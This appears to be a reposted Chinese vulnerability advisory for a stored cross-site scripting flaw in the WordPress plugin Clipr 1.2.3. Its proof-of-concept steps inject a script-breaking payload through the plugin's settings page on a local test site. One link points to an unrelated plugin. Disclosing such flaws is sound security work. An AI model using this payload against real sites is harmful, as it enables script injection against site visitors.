WordPress Clipr 1.2.3 跨站脚本

# 供应​​商主页：https://wordpress.org/plugins/clipr/

<https://wordpress.org/plugins/amministrazione-aperta/>

# 版本：1.2.3

# 测试：火狐

#POC

代码语言：javascript复制

- 安装插件 https://wordpress.org/plugins/clipr/
- 导航到插件的设置页面：
http://localhost:10003/wp-admin/options-general.php?page=clip
- 注入paylaod `asdasd'></script><script>alert(1)</script>`
- 导航到 WordPress URL 的主页
`http://localhost:10003/` <http://localhost:10003/>
- 恶意 Javascript 有效负载将执行。

https wordpress 网络安全 网站建设

0 人点赞